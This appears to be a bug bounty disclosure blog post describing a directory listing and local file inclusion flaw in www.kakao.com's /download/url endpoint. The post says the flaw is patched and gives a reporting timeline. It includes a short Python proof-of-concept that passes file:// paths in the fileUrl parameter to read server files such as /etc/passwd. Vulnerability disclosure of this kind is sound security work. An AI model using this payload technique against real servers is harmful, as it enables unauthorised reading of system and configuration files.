---
title: Directory Listing and LFI in www.kakao.com
date: 2021-10-07 12:03:00
tags: Bug Bounty
categories: Bug Bounty
password: dlfi
mathjax: true # add this statement, MathJax will be enabled in this post.
message: Encrypt
---
## Summary

On the dawn of October 7, 2021, I found a 'LFI via file download' in www.kakao.com. This vulnerability is a very fatal vulnerability that can use the `Directory Listing` vulnerability to identify the directory structure and click all files including `system main files`, `server configuration files`, and `source code'.

---

## Platform(s) Affected

```txt
https://www.kakao.com/download/url
```
The `LFI` vulnerability occurred in the `URL` above.

---
## Description

![1.png](https://github.com/blogpocas/DATA/blob/main/BB/Kakao/DL%20and%20LFI%20in%20www.kakao.com/1.png?raw=true)

After connecting the terms and conditions page on the www.kakao.com, if I check the code, I can see that there is a `Download` form tag as shown above, and I can see that a hidden parameter called `fileUrl` is also exposed!!

However, Even If I pass `/etc/passwd` or `/etc/hosts` as the value of `fileUrl` in `/download/url`, the files are downloaded but empty files are downloaded. So I tried `LFI` using `file://` scheme because the parameter also contains the character `Url`.

![2.png](https://github.com/blogpocas/DATA/blob/main/BB/Kakao/DL%20and%20LFI%20in%20www.kakao.com/2.png?raw=true)

As a result of an attempt, we were able to successfully leak the `/etc/passwd` file to the Kakao server as shown in the picture above.

(If a directory path other than a specific file is given using the `file://` scheme, the `Directory Listing` vulnerability occurs, so an attacker can use this to identify the internal `Tree` and obtain the desired file at will.)

---
## PoC
<style>
    .myvideo {
        width: auto;
        max-width: 100%;
        height: auto;
    }
</style>
<video class="myvideo" controls preload>
    <source src="https://github.com/blogpocas/DATA/blob/main/BB/Kakao/DL%20and%20LFI%20in%20www.kakao.com/LFI.mov?raw=true" type="video/mp4">
</video>

```python
import requests

while(1):
        filename = input("[+] Enter the filename : ")
        res = requests.get("https://kakao.com/download/url?fileUrl=file://{}".format(filename))
        print("[-] " + res.text)
```

Finally, I wrote the POC code as above. Using the POC, I was able to easily leak all the files on the Kakao server.

---
## Reporting Timeline

- 2021-10-07 12h **m : Found an LFI via file download in www.kakao.com
- 2021-10-07 12h **m : Reported this issue via the Kakao.
- 2021-10-14 **h **m : Patched by Kakao Information Security Team Manager
- 2021-10-14 16h 17m : Re report this issue via Kisa. (Kakao Information Security Team Manager requests re-report)
- 2021-12-10 17h 05m : Validated this issue by Kakao Information Security Team Manager

---